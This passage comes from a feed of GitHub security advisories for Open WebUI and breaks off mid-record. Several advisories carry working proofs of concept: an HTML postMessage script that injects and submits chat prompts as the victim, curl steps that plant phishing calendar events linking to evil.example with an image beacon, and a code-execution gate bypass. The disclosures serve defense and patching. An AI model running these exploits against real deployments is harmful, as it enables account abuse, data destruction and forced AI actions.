privileges without consent.\n\n### Details\n\nThe chat page's window message listener in `src/lib/components/chat/Chat.svelte` processes message types including `input:prompt` and `action:submit` without adequately enforcing same-origin restrictions. Based on code around lines ~597-616, input text is set directly from `event.data.text`; `action:submit` proceeds to `submitPrompt()` on the current prompt. The logic does not apply a strict origin allowlist and permits non-same-origin control of the chat input and submission flow, leading to cross-origin command execution in the victim's authenticated UI context. As a result, backend API calls (e.g., `POST /api/v1/chats/new`, `POST /api/chat/completions`) are sent under victim credentials.\n\nNormally, via the `input:prompt:submit` postMessage type, this results in a \"Confirm Prompt from Embed\" confirmation dialog:\n\nhttps://github.com/open-webui/open-webui/blob/9bd84258d09eefe7bf975878fb0e31a5dadfe0f8/src/lib/components/chat/Chat.svelte#L604-L622\n\nHowever, combining the two other types, it is possible to achieve the same effect without this confirmation:\n\nhttps://github.com/open-webui/open-webui/blob/9bd84258d09eefe7bf975878fb0e31a5dadfe0f8/src/lib/components/chat/Chat.svelte#L584-L602\n\n### PoC\n\n1. Set up a local Open WebUI instance and log in to it, making sure a model is configured\n2. Host the following HTML anywhere and visit it (optionally change http://127.0.0.1:14000 to your instance Base URL):\n\n```html\n\u003ch1\u003eClick anywhere\u003c/h1\u003e\n\u003cscript\u003e\n  function sleep(ms) {\n    return new Promise(r =\u003e setTimeout(r, ms));\n  }\n  \n  onclick = async () =\u003e {\n    w = window.open('http://127.0.0.1:14000');\n    await sleep(2000);\n    w.postMessage({ type: 'input:prompt', text: \"INJECTED PROMPT\" }, '*');\n    await sleep(500);\n    w.postMessage({ type: 'action:submit' }, '*');\n  }\n\u003c/script\u003e\n```\n\n3. Click anywhere on the page, then notice without further interaction the \"INJECTED PROMPT\" is executed on the Open WebUI instance\n\n\u003cimg width=\"874\" height=\"264\" alt=\"image\" src=\"https://github.com/user-attachments/assets/244d9015-0dbf-47e0-a30e-1c2fbbde5e58\" /\u003e\n\n### Impact\n\nConditions required: The victim must be authenticated to Open WebUI in the browser (token cookie present).\n\nThis issue enables cross-site forced actions under the victim's identity. An attacker can silently inject prompts and trigger model/tool execution (e.g., code interpreter, web search, retrieval, terminal/tool servers) as the victim without confirmation.\n\n### Original Agent Report\n\n\u003cimg width=\"400\" alt=\"app aikido dev_ai-pentests_projects_116389_assessments_019d67d4-81c8-7dd2-bb9e-0a4a774b2c78_issues_sidebarIssue=20439940 (4)\" src=\"https://github.com/user-attachments/assets/7b6521ed-d08b-446d-a918-103523d08a1e\" /\u003e","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-06-17T14:10:35.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.1,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-3vv5-8xxp-4f55","https://nvd.nist.gov/vuln/detail/CVE-2026-54007","https://github.com/advisories/GHSA-3vv5-8xxp-4f55","https://github.com/open-webui/open-webui","https://github.com/pypa/advisory-database/tree/main/vulns/open-webui/PYSEC-2026-2695.yaml","https://pypi.org/project/open-webui"],"source_kind":"github","identifiers":["GHSA-3vv5-8xxp-4f55","CVE-2026-54007"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-17T15:00:08.452Z","updated_at":"2026-09-03T03:02:23.446Z","epss_percentage":0.00231,"epss_percentile":0.13765,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zdnY1LTh4eHAtNGY1Nc4ABY4b","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0zdnY1LTh4eHAtNGY1Nc4ABY4b","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.6","vulnerable_version_range":"\u003c= 0.9.5"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zdnY1LTh4eHAtNGY1Nc4ABY4b/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1mM2c3LTU5cWMtcHFnNs4ABY4a","url":"https://github.com/advisories/GHSA-f3g7-59qc-pqg6","title":"Open WebUI IDOR: Calendar event re-parenting allows writing events into another user's calendar","description":"### Summary\n\n`POST /api/v1/calendars/events/{event_id}/update` validates that the caller has **write** access to the calendar the event *currently* belongs to, but does not validate the **destination** `calendar_id` supplied in the request body. The model layer then persists the new `calendar_id` unconditionally.\n\nA regular `user`-role account can therefore create an event in their own calendar and immediately move it into any other user's calendar whose ID they know — bypassing the authorization check that `create_event` correctly performs. This is reachable on **default configuration**: `ENABLE_CALENDAR` and `USER_PERMISSIONS_FEATURES_CALENDAR` both default to `True`.\n\n\n### Details\n### Sink — missing destination check\n\n`backend/open_webui/routers/calendar.py:283-297`\n\n```python\n@router.post('/events/{event_id}/update', response_model=CalendarEventModel)\nasync def update_event(\n    request: Request, event_id: str, form_data: CalendarEventUpdateForm,\n    user: UserModel = Depends(get_verified_user)\n):\n    await check_calendar_permission(request, user)\n    event = await CalendarEvents.get_event_by_id(event_id)\n    if not event:\n        raise HTTPException(status_code=404, detail='Event not found')\n\n    await _check_calendar_access(event.calendar_id, user, 'write')   # ← SOURCE only\n\n    updated = await CalendarEvents.update_event_by_id(event_id, form_data)  # ← writes form_data.calendar_id\n    ...\n```\n\n`backend/open_webui/models/calendar.py:658-693` (`update_event_by_id`)\n\n```python\nupdate_data = form_data.model_dump(exclude_unset=True)\nfor field in [\n    'calendar_id',          # ← destination persisted with no ACL\n    'title', 'description', 'start_at', 'end_at', 'all_day',\n    'rrule', 'color', 'location', 'is_cancelled',\n]:\n    if field in update_data:\n        setattr(event, field, update_data[field])\n```\n\n### Reference — `create_event` does check the destination\n\n`backend/open_webui/routers/calendar.py:255`\n\n```python\nawait _check_calendar_access(form_data.calendar_id, user, 'write')\n```\n\n### Default-config gates (both `True`)\n\n- `backend/open_webui/config.py:1658-1662` — `ENABLE_CALENDAR` defaults `'True'`\n- `backend/open_webui/config.py:1554` — `USER_PERMISSIONS_FEATURES_CALENDAR` defaults `'True'`\n- `backend/open_webui/main.py:1457` — router mounted unconditionally\n\n\n### PoC\nVerified end-to-end against the official `ghcr.io/open-webui/open-webui:main` (v0.9.4) Docker image with two fresh `user`-role accounts.\n\n#### 1. Environment\n\n```bash\ngit clone https://github.com/open-webui/open-webui.git\ncd open-webui \u0026\u0026 docker compose up -d        # http://localhost:3000\n```\n\nCreate the first account (admin), then via admin UI / `POST /api/v1/auths/add` create two `user`-role accounts: **attacker** and **victim**. Sign each in and capture their JWTs as `$ATTACKER_TOKEN` / `$VICTIM_TOKEN`.\n\n#### 2. Obtain the victim's `calendar_id`\n\nCalendar IDs are UUIDv4 (`models/calendar.py:316`) and not enumerable. In practice an attacker obtains one via:\n\n- **Read-only share** — victim (or a group admin) grants the attacker `read` on a calendar; the ID is returned by `GET /api/v1/calendars/`.\n- **Event invitation** — victim adds the attacker as an attendee on any event; the event payload (`CalendarEventModel`, `models/calendar.py:127`) includes `calendar_id`.\n- Any side-channel (logs, screenshots, browser history).\n\nFor reproduction the maintainer can simply read it as the victim:\n\n```bash\nVICTIM_CALENDAR_ID=$(curl -s \"$OPENWEBUI/api/v1/calendars/\" \\\n  -H \"Authorization: Bearer $VICTIM_TOKEN\" | python3 -c 'import sys,json;print(json.load(sys.stdin)[0][\"id\"])')\n```\n\n#### 3. Control — direct create is correctly blocked\n\n```bash\ncurl -s -o /dev/null -w '%{http_code}\\n' \\\n  -X POST \"$OPENWEBUI/api/v1/calendars/events/create\" \\\n  -H \"Authorization: Bearer $ATTACKER_TOKEN\" -H 'Content-Type: application/json' \\\n  -d \"{\\\"calendar_id\\\":\\\"$VICTIM_CALENDAR_ID\\\",\\\"title\\\":\\\"x\\\",\\\"start_at\\\":1778400000000000000,\\\"end_at\\\":1778403600000000000}\"\n# → 403\n```\n\n#### 4. Exploit — create-then-reparent\n\n```bash\nATTACKER_CAL=$(curl -s \"$OPENWEBUI/api/v1/calendars/\" \\\n  -H \"Authorization: Bearer $ATTACKER_TOKEN\" | python3 -c 'import sys,json;print(json.load(sys.stdin)[0][\"id\"])')\n\n# 1. create in own calendar\nEVENT_ID=$(curl -s -X POST \"$OPENWEBUI/api/v1/calendars/events/create\" \\\n  -H \"Authorization: Bearer $ATTACKER_TOKEN\" -H 'Content-Type: application/json' \\\n  -d \"{\\\"calendar_id\\\":\\\"$ATTACKER_CAL\\\",\\\"title\\\":\\\"[INJECTED] Mandatory re-auth: https://evil.example/login\\\",\\\"description\\\":\\\"Session expired.\\\",\\\"location\\\":\\\"\u003cimg src=https://evil.example/beacon.png\u003e\\\",\\\"start_at\\\":1778400000000000000,\\\"end_at\\\":1778403600000000000}\" \\\n  | python3 -c 'import sys,json;print(json.load(sys.stdin)[\"id\"])')\n\n# 2. move into victim's calendar — NO destination check\ncurl -s -X POST \"$OPENWEBUI/api/v1/calendars/events/$EVENT_ID/update\" \\\n  -H \"Authorization: Bearer $ATTACKER_TOKEN\" -H 'Content-Type: application/json' \\\n  -d \"{\\\"calendar_id\\\":\\\"$VICTIM_CALENDAR_ID\\\"}\"\n# → 200, response shows \"calendar_id\":\"\u003cVICTIM_CALENDAR_ID\u003e\"\n```\n\n#### 5. Verification from victim's session\n\n```bash\ncurl -s \"$OPENWEBUI/api/v1/calendars/events?start=2026-05-01T00:00:00\u0026end=2026-06-01T00:00:00\" \\\n  -H \"Authorization: Bearer $VICTIM_TOKEN\" | python3 -m json.tool\n```\n\nObserved output (truncated):\n\n```json\n[{\n  \"id\": \"1662c982-adb1-43d6-a9c8-0103fa1299c0\",\n  \"calendar_id\": \"0b755ea7-4ff4-4a60-9cff-8961e69c75bb\",\n  \"user_id\": \"7554dd33-e220-44cb-8441-169c55eef4f5\",\n  \"title\": \"[INJECTED] Mandatory re-auth: https://evil.example/login\",\n  \"description\": \"Session expired.\",\n  ...\n}]\n```\n\nThe injected event now lives in the victim's default calendar. A subsequent `GET /events/{id}` as the **attacker** returns **403** — confirming the move succeeded and the attacker has no legitimate access to the destination.\n\n\n### Impact\n- **Read-only → write escalation** on shared calendars: a user granted `read` via `AccessGrants` can effectively write.\n- **Phishing / social engineering**: events appear inside the victim's own private calendar (not as an external invite). The hover tooltip (`CalendarEventChip.svelte:12 → common/Tooltip.svelte`) renders `title`/`location` as DOMPurify-sanitised HTML with `allowHTML=true`, so an attacker can embed formatted links and `\u003cimg\u003e` beacons (read-receipt when the victim hovers). DOMPurify prevents script execution, so this is HTML injection, not XSS.\n- **Calendar spam / DoS**: unlimited one-shot injections (attacker loses access to each event after the move, but can repeat with new events).","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-06-17T14:09:53.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-f3g7-59qc-pqg6","https://nvd.nist.gov/vuln/detail/CVE-2026-54006","https://github.com/advisories/GHSA-f3g7-59qc-pqg6","https://github.com/open-webui/open-webui","https://github.com/pypa/advisory-database/tree/main/vulns/open-webui/PYSEC-2026-2722.yaml","https://pypi.org/project/open-webui"],"source_kind":"github","identifiers":["GHSA-f3g7-59qc-pqg6","CVE-2026-54006"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-17T15:00:08.452Z","updated_at":"2026-09-03T03:02:23.447Z","epss_percentage":0.00299,"epss_percentile":0.21922,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mM2c3LTU5cWMtcHFnNs4ABY4a","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1mM2c3LTU5cWMtcHFnNs4ABY4a","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.6","vulnerable_version_range":"\u003c= 0.9.5"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mM2c3LTU5cWMtcHFnNs4ABY4a/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1oM3d3LXE2eHgtdzd4M84ABW5O","url":"https://github.com/advisories/GHSA-h3ww-q6xx-w7x3","title":"Open WebUI: LDAP and OAuth First-User Race Condition Allows Multiple Admin Accounts","description":"## Summary\n\nThe LDAP and OAuth authentication flows use a TOCTOU (Time-of-Check-Time-of-Use) pattern for first-user admin role assignment. The regular signup handler (`signup_handler` in auths.py, line 663) was explicitly patched to prevent this race with the comment *\"Insert with default role first to avoid TOCTOU race\"*, but the LDAP and OAuth code paths were never updated with the same fix.\n\n## Vulnerable Code\n\n### LDAP (auths.py, lines 479-490)\n```python\n# Line 482 - CHECK: is the user table empty?\nrole = 'admin' if not Users.has_users(db=db) else request.app.state.config.DEFAULT_USER_ROLE\n\n# Lines 484-490 - USE: create user with the role determined above\nuser = Auths.insert_new_auth(\n    email=email,\n    password=str(uuid.uuid4()),\n    name=cn,\n    role=role,   # \u003c-- role was determined BEFORE insert, race window exists\n    db=db,\n)\n```\n\n### OAuth (oauth.py, lines 1103-1112, 1566-1574)\n```python\n# Line 1104 - CHECK: count users\ndef get_user_role(self, user, user_data):\n    user_count = Users.get_num_users()\n    if not user and user_count == 0:\n        return 'admin'    # Line 1112\n\n# Lines 1566-1574 - USE: create user with pre-determined role\nuser = Auths.insert_new_auth(\n    ...\n    role=self.get_user_role(None, user_data),  # Line 1571\n    ...\n)\n```\n\nBoth paths determine the role BEFORE inserting the user, creating a race window where multiple concurrent requests on a fresh instance can all observe an empty database and all receive the `admin` role.\n\n## Comparison with Patched Signup\n\nThe `signup_handler` (auths.py, line 663) was explicitly fixed:\n```python\n# Insert with default role first to avoid TOCTOU race\nuser = Auths.insert_new_auth(..., role=DEFAULT_USER_ROLE, ...)\n# Then check if this is the only user and upgrade\nif Users.get_num_users() == 1:\n    Users.update_user_role_by_id(user.id, 'admin')\n```\n\nThe LDAP and OAuth paths did NOT receive this fix.\n\n## Exploitation\n\n1. Deploy Open WebUI with LDAP or OAuth enabled on a fresh instance (no existing users)\n2. Send multiple concurrent authentication requests from different users\n3. Multiple requests pass the `has_users()` / `get_num_users() == 0` check simultaneously\n4. All concurrent users become administrators\n\n`DATABASE_ENABLE_SESSION_SHARING` defaults to `False` (env.py:387), so each call uses its own database session, widening the race window.\n\n## Impact\n\nAny LDAP/OAuth user who times their first login concurrently with the legitimate first admin can escalate to full admin privileges, gaining access to all user data, system configuration, API keys, and connected LLM backends.\n\n## Suggested Fix\n\nApply the same insert-then-check pattern used in `signup_handler`: insert the user with `DEFAULT_USER_ROLE` first, then atomically check if this is the only user and upgrade to admin only if so.\n\n## Resolution\n\nFixed in PR [#23626](https://github.com/open-webui/open-webui/pull/23626) (commit [96a0b3239](https://github.com/open-webui/open-webui/commit/96a0b3239b1aadb23fc359bf10849c9ba12fd6ec)), first released in **v0.9.0** (Apr 2026). Both LDAP (`routers/auths.py`) and OAuth (`utils/oauth.py`) registration paths now use the same insert-first-check-after pattern that `signup_handler` already had:\n\n1. Insert the new user with `DEFAULT_USER_ROLE` unconditionally — no pre-insert role decision based on user count.\n2. After the insert commits, atomically call `Users.get_num_users() == 1` to check whether this is the sole user.\n3. Only the sole user gets promoted to `admin` via `Users.update_user_role_by_id`.\n\n`OAuthManager.get_user_role` was also updated to return `DEFAULT_USER_ROLE` (not `admin`) for first-user bootstrap; admin promotion is deferred to the post-insert check above. With this ordering, two concurrent first-user registrations that both observe an empty table can both insert, but only one will see `get_num_users() == 1` afterward — the other will see `== 2` and not be promoted.\n\nUsers on `\u003e= 0.9.0` are not affected.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-14T20:28:46.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-h3ww-q6xx-w7x3","https://github.com/open-webui/open-webui/pull/23626","https://github.com/open-webui/open-webui/commit/96a0b3239b1aadb23fc359bf10849c9ba12fd6ec","https://github.com/open-webui/open-webui/releases/tag/v0.9.0","https://nvd.nist.gov/vuln/detail/CVE-2026-45675","https://github.com/pypa/advisory-database/tree/main/vulns/open-webui/PYSEC-2026-2730.yaml","https://github.com/advisories/GHSA-h3ww-q6xx-w7x3"],"source_kind":"github","identifiers":["GHSA-h3ww-q6xx-w7x3","CVE-2026-45675"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.481Z","updated_at":"2026-09-03T03:03:09.083Z","epss_percentage":0.00354,"epss_percentile":0.28023,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oM3d3LXE2eHgtdzd4M84ABW5O","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1oM3d3LXE2eHgtdzd4M84ABW5O","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.0","vulnerable_version_range":"\u003c= 0.8.12"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oM3d3LXE2eHgtdzd4M84ABW5O/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS00ODJqLTJwcTYtcTV3NM4ABW5N","url":"https://github.com/advisories/GHSA-482j-2pq6-q5w4","title":"Open WebUI: Jupyter code execution works despite `ENABLE_CODE_EXECUTION=false` — feature gate bypassed","description":"### Summary\n\nThe `/api/v1/utils/code/execute` endpoint executes arbitrary Python code via Jupyter for any verified user, even when the admin has set `ENABLE_CODE_EXECUTION=false`. The feature gate is not enforced on the API endpoint — the configuration says \"disabled\" but code still executes.\n\n### Details\n\nThe admin configuration correctly shows `ENABLE_CODE_EXECUTION: false`. However, the code execution endpoint does not check this flag before forwarding Python code to the Jupyter server. Any authenticated user can execute arbitrary code in the Jupyter container.\n\n### PoC\n\n**Verified against Open WebUI v0.8.11 (latest) Docker on 2026-03-25.**\n\n**Setup:** Jupyter server connected, `ENABLE_CODE_EXECUTION=false` confirmed in admin config.\n\n```bash\n# Step 1: Verify code execution is disabled\ncurl -s http://target:8080/api/v1/configs/code_execution \\\n  -H \"Authorization: Bearer $TOKEN\"\n# Returns: {\"ENABLE_CODE_EXECUTION\": false, ...}\n\n# Step 2: Execute code anyway — gate bypassed\ncurl -s -X POST http://target:8080/api/v1/utils/code/execute \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -H 'Content-Type: application/json' \\\n  -d '{\"code\":\"import os; print(os.popen(\\\"id\\\").read())\"}'\n```\n\n**Verified output:**\n\n```\nConfig: {\"ENABLE_CODE_EXECUTION\":false,\"CODE_EXECUTION_ENGINE\":\"jupyter\",...}\n\nexecute_status=200\nexecute_body={\"stdout\":\"OPEN-WEBUI-SSRF-SECRET\",\"stderr\":\"\",\"result\":\"\"}\n```\n\nThe PoC read the internal secret service content via Jupyter — despite `ENABLE_CODE_EXECUTION=false`. The Jupyter container has network access to internal services, making this both a code execution bypass and an SSRF vector.\n\n### Impact\n\nAny authenticated user can execute arbitrary Python code in the Jupyter container, even when the admin has explicitly disabled code execution:\n\n- Arbitrary code execution in the Jupyter container (read files, spawn processes)\n- Network access to all internal Docker services from the Jupyter container\n- Data exfiltration from internal services\n- The admin's security configuration (`ENABLE_CODE_EXECUTION=false`) is silently ineffective\n- Users who are told \"code execution is disabled\" have a false sense of security\n\n## Resolution\n\nFixed in commit [6d736d3c5](https://github.com/open-webui/open-webui/commit/6d736d3c598dbe49488675ed42845e00b62dfcba), first released in **v0.8.12**. The `/api/v1/utils/code/execute` handler in `backend/open_webui/routers/utils.py` now checks `request.app.state.config.ENABLE_CODE_EXECUTION` before dispatching to the Jupyter engine and returns 403 with `FEATURE_DISABLED('Code execution')` when the admin has disabled the flag. The retrieval-side code path was gated in the same commit. Users on `\u003e= 0.8.12` are not affected.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-14T20:28:40.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-482j-2pq6-q5w4","https://github.com/open-webui/open-webui/commit/6d736d3c598dbe49488675ed42845e00b62dfcba","https://github.com/open-webui/open-webui/releases/tag/v0.8.12","https://nvd.nist.gov/vuln/detail/CVE-2026-45672","https://github.com/advisories/GHSA-482j-2pq6-q5w4"],"source_kind":"github","identifiers":["GHSA-482j-2pq6-q5w4","CVE-2026-45672"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.481Z","updated_at":"2026-09-03T03:03:09.084Z","epss_percentage":0.00406,"epss_percentile":0.33539,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00ODJqLTJwcTYtcTV3NM4ABW5N","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS00ODJqLTJwcTYtcTV3NM4ABW5N","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.8.12","vulnerable_version_range":"\u003c= 0.8.11"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00ODJqLTJwcTYtcTV3NM4ABW5N/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0yNmc5LTI3dm0teDNxOM4ABW5M","url":"https://github.com/advisories/GHSA-26g9-27vm-x3q8","title":"Open WebUI: shared-chat branch ignores access_type, allowing unauthorized file deletion","description":"### Summary\n\nAny authenticated user can permanently delete files owned by other users via `DELETE /api/v1/files/{id}` when the target file is referenced in any shared chat. The `has_access_to_file()` authorization gate unconditionally grants access through its shared-chat branch. It checks neither the requesting user's identity nor the type of operation being performed. File UUIDs (which would otherwise be impractical to guess) are disclosed to any user with read access to a knowledge base via `GET /api/v1/knowledge/{id}/files`.\n\n### Details\n\nThe root cause is in `has_access_to_file()` in [backend/open_webui/routers/files.py](https://github.com/open-webui/open-webui/blob/main/backend/open_webui/routers/files.py).\n\nWhen a user calls `DELETE /api/v1/files/{file_id}`, the endpoint delegates authorization to `has_access_to_file(file_id, access_type=\"write\", user=requesting_user)`. Inside that function, one branch checks whether the file is referenced in any shared chat:\n\n```python\nchats = Chats.get_shared_chats_by_file_id(file_id, db=db)\nif chats:\n    return True\n```\n\nThis branch has two missing checks:\n\n1. **No user check:** It asks \"does any shared chat anywhere reference this file?\", not \"does the requesting user own or participate in that chat.\" Any authenticated user passes this check.\n2. **No operation check:** The `access_type` parameter (`\"write\"` for delete) is accepted but never inspected. The branch returns `True` regardless of whether the caller is requesting read access or delete access.\n\nThe result: if any user has shared any chat that references a file, that file becomes deletable by every authenticated user on the instance.\n\nThe delete endpoint has no secondary ownership check (unlike the content-update endpoint), so this authorization bypass leads directly to permanent file removal from the database, disk, and all knowledge base associations.\n\n**How an attacker obtains file UUIDs:**\n\nUUIDs are impractical to brute-force, but they don't need to be. Any user with read access to a knowledge base can retrieve the file IDs of every document in it via `GET /api/v1/knowledge/{id}/files`. In deployments where knowledge bases are shared across teams (a common and intended use case), this gives any regular user a list of valid file UUIDs they can target.\n\n**Suggested fix**:  gate the shared-chat branch on `access_type` so it only authorizes read operations:\n\n```python\nif access_type == \"read\":\n    chats = Chats.get_shared_chats_by_file_id(file_id, db=db)\n    if chats:\n        return True\n```\n\n**Classification:**\n- CWE-639: Authorization Bypass Through User-Controlled Key\n- OWASP API1:2023: Broken Object Level Authorization\n- CVSS 3.1: 5.7 — `AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H`\n\nTested on Open WebUI **0.8.3** using a default Docker configuration.\n\n### PoC\n\n**Prerequisites:**\n- Default Open WebUI installation (Docker: `ghcr.io/open-webui/open-webui:main`)\n- Two user accounts: a victim (any role) and an attacker (role: `user`)\n\n**Setup (victim):**\n1. Log in as the victim\n2. Create a knowledge base and upload a document\n3. Start a new chat, attach the KB file, and send a message\n4. Share the chat using the share button\n\n**Obtaining the file UUID (attacker):**\n\nIf the attacker has read access to the knowledge base (e.g. a shared team KB), the file UUID is available via:\n\n```\nGET /api/v1/knowledge/{kb_id}/files\n```\n\nThis returns metadata for all files in the KB, including their UUIDs.\n\n**Exploit (attacker):**\n\n```bash\npython3 poc.py --url http://\u003chost\u003e:3000 --file-id \u003ctarget-file-uuid\u003e -t \u003cattacker-jwt\u003e\n```\n\nThe PoC script (attached as `poc.py`):\n1. Authenticates as the attacker\n2. Confirms the target file is accessible via `GET /api/v1/files/{id}/data/content`\n3. Deletes the file via `DELETE /api/v1/files/{id}`\n4. Verifies permanent deletion (HTTP 404 on subsequent GET)\n\nNo special tooling is required — the script uses only Python 3 standard library (`urllib`).\n\n### Impact\n\n**Who is affected:** Any multi-user Open WebUI deployment where chat sharing is enabled (the default). The attacker needs a valid account (any role) and a target file UUID, which is available through any shared knowledge base.\n\n**What can happen:**\n- **Permanent data destruction:** The file is removed from the database, disk, and all knowledge base associations with no recovery mechanism.\n- **Knowledge base degradation:** If the file was part of a RAG knowledge base, that KB silently loses the document with no user-facing indication that content is missing.\n- **No audit trail:** The delete operation does not record which user performed it.\n\nSharing a chat is a routine collaboration action. The current behavior means that doing so inadvertently makes every referenced file deletable by any authenticated user on the instance.\n\n### Disclaimer on the use of AI powered tools \n\nThe research and reporting related to this vulnerability was aided by AI tools. \n\n## Scope clarification\n\nThe root cause is the `has_access_to_file()` shared-chat branch returning `True` regardless of `access_type` or requesting user. The original PoC demonstrates DELETE (`access_type='write'`), but the same gate is what authorizes the read (`GET /api/v1/files/{id}`, `GET /api/v1/files/{id}/content`) and modify (`POST /api/v1/files/{id}/data/content/update`) endpoints. All three access modes are bypassed by the same function gap, so the practical impact is read + modify + delete on any file referenced by any shared chat.\n\n## Resolution\n\nFixed in commit [2e52ad8ff](https://github.com/open-webui/open-webui/commit/2e52ad8ff2f8d9ed9f38f76e9bc19c8f92d91fc3) (\"refac: shared chat\"), first released in **v0.9.0** (Apr 2026). The shared-chat feature was refactored to introduce a dedicated `shared_chats` table and gate shared-chat access through `AccessGrants` (`resource_type='shared_chat'`). `has_access_to_file()` (now in `backend/open_webui/utils/access_control/files.py:68-80`) calls `AccessGrants.get_accessible_resource_ids` to filter the shared-chat IDs to only those the requesting user has an explicit grant on — ownership, group membership, or public share — before returning `True`\n\nThe new gate is permission-aware ('read' here) and user-aware, closing both the \"any user passes\" issue and the \"access_type ignored\" issue. Users on \u003e= 0.9.0 are not affected.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-14T20:28:34.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.0,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-26g9-27vm-x3q8","https://github.com/open-webui/open-webui/commit/2e52ad8ff2f8d9ed9f38f76e9bc19c8f92d91fc3","https://github.com/open-webui/open-webui/releases/tag/v0.9.0","https://nvd.nist.gov/vuln/detail/CVE-2026-45671","https://github.com/advisories/GHSA-26g9-27vm-x3q8"],"source_kind":"github","identifiers":["GHSA-26g9-27vm-x3q8","CVE-2026-45671"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.481Z","updated_at":"2026-09-03T03:03:09.084Z","epss_percentage":0.0027,"epss_percentile":0.1855,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yNmc5LTI3dm0teDNxOM4ABW5M","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0yNmc5LTI3dm0teDNxOM4ABW5M","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.0","vulnerable_version_range":"\u003c= 0.8.12"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yNmc5LTI3dm0teDNxOM4ABW5M/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1tNjl3LXA3bTQtNTg1as4ABW5L","url":"https://github.com/advisories/GHSA-m69w-p7m4-585j","title":"Open WebUI: Unauthenticated endpoint can trigger embedding generation (cost/DoS)","description":"### Summary\nGET `/api/v1/memories/ef` is accessible without authentication and executes `request.app.state.EMBEDDING_FUNCTION(...)`. This allows any unauthenticated caller to trigger embedding generation which can lead to direct cost exposure if a paid provider is used.\nCode reference: `backend/open_webui/routers/memories.py` (@router.get(\"/ef\") -\u003e calls `request.app.state.EMBEDDING_FUNCTION(\"hello world\"))`.\n\n\n### Details\nGET `/api/v1/memories/ef` is reachable without authentication and triggers request.app.state.EMBEDDING_FUNCTION(\"hello world\"). This crosses an intended security boundary by allowing unauthenticated users to invoke potentially expensive embedding computation and/or paid upstream embedding APIs.\n\n### PoC\n1. Start Open WebUI in default configuration (no special env hardening; default ENABLE_MEMORIES is true).\n2. From an unauthenticated client (no cookies/Authorization header), call:\n      curl -i http://\\\u003chost\\\u003e:\\\u003cport\\\u003e/api/v1/memories/ef\n   3. Observe the server performs embedding generation and returns a response like:\n   - HTTP 200 with JSON containing the result.\n\nHow it can be abused / attacker actions:\n\n- Send repeated requests to `/api/v1/memories/ef` to:\n  - consume CPU/GPU resources (DoS)\n  - generate sustained outbound usage to embedding providers if configured (cost + rate-limit exhaustion)\n  - degrade latency/availability for legitimate users\n \n### Impact\nIf embeddings are configured to use paid/remote providers 